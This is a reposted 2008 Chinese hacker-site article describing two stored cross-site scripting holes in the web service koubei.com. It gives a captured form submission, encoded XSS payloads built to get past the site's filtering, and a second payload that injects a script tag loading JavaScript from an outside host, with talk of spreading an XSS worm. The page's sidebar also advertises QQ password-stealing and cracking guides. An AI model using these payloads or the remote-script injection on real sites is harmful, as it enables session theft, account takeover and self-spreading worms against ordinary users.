设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 黑客技术 -> 文章内容 [站内搜索]  

 
口碑网XSS Trap
作者:不详  来源:网络  发布时间:2008-6-5 18:34:43  发布人:www.hack86.com
口碑网XSS Trap 
 

口碑网www.koubei.com,很火的一个WEB2.0信息共享网站。口碑确实不错,不过安全性就不是这样了。刚刚发现的两个XSS Trap,可以轻易爆发XSS WORM。口碑网的XSS Trap肯定不止这两个,其它的就没渗透的必要了:)

XSS Trap ONE:

博客的发表文章处,这个编辑器我估计是漏洞不少,虽然在客户端过滤的不错,但是使用Firefox的Tamper Data插件就轻易绕过。发文章时,Tamper Data截获的部分数据如下:

—————————–2416075422974\r\nContent-Disposition: form-data; name=”subject”\r\n\r\n文章标题在此……\r\n—————————–2416075422974\r\nContent-Disposition: form-data; name=”itemtypeid”\r\n\r\n4293386\r\n—————————–2416075422974\r\nContent-Disposition: form-data; name=”message”\r\n\r\n文章正文在此……\r\n—————————–2416075422974–\r\n

将 “文章正文在此……”替换为:<IMG src=”jav&#9;ascr&#9;ipt:alert(’XSS’);”>或<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72& amp;#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 等等,都可以发生跨站,这里我做了编码处理,可以绕过服务端的过滤。其它的构造自己发散思维了:)。你直接提交是不可能成功滴。

XSS Trap TW

个 人信息设置的标题处,客户端有字数的限制,此表单提交时使用了DWR的AJAX模块,即使使用Firefox的Tamper Data或Live HTTP headers等插件都无法充当中间攻击角色,虽然它们确实拦截了HTTP信息包。针对AJAX的攻击手法,还得这样做:http://www.0×37.com/post/21.html, 在本地构造伪客户端来链接远程AJAX模块,并提交我们的信息,于是客户端的字数限制等等都将无用。我提交了这样的数 据:’)”><script src=http://www.0×37.com/Project/koubei.js></script><a>。

当你的js文件能够被目标服务器加载时,那这个XSS WORM还怕诞生不了吗?口碑网有些功能模块发数据时要填写验证码,这样的模块是XSS WORM无法黑入的地方:.(。除非能绕过验证码限制。关于如何Code这样的蠕虫我以前的好些篇文章都有详细说明。

我 现在又有负罪感了……因为再过些天我就要毕业答辩,我的毕业论文还没写好……时间又花在这上面,我只能说:这个不好玩了……我现在最烦的是我的实验没数 据,红外光谱、核磁共振、DSC、黏胶渗透色谱……我一个都没做,可恶!为什么没给我安排上这些过程……开始认真起来,写论文去,转型也不差这点时间……

技术转型…… 

 
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  网站推广:口碑宣传..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
免费QQ蓝钻体验(附考试答案)
8款QQ空间免费开场动画
 
微软报告说苹果Safari浏览器不安.. 06-05
香港域名网站居全球最危险 被黑客.. 06-05
陕西抓获攻击省地震信息网站案疑.. 06-05
解析国内二线品牌机系统保护软件.. 06-05
强大的Windows Server 2008防火墙.. 06-05
MySQL Proxy(解决注入的另一思路.. 06-05
模拟入侵者检测网络攻击 06-05
网站防止注入入侵的一些有效代码.. 06-05
口碑网XSS Trap 06-05
关于phpwind克隆用户 06-05
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com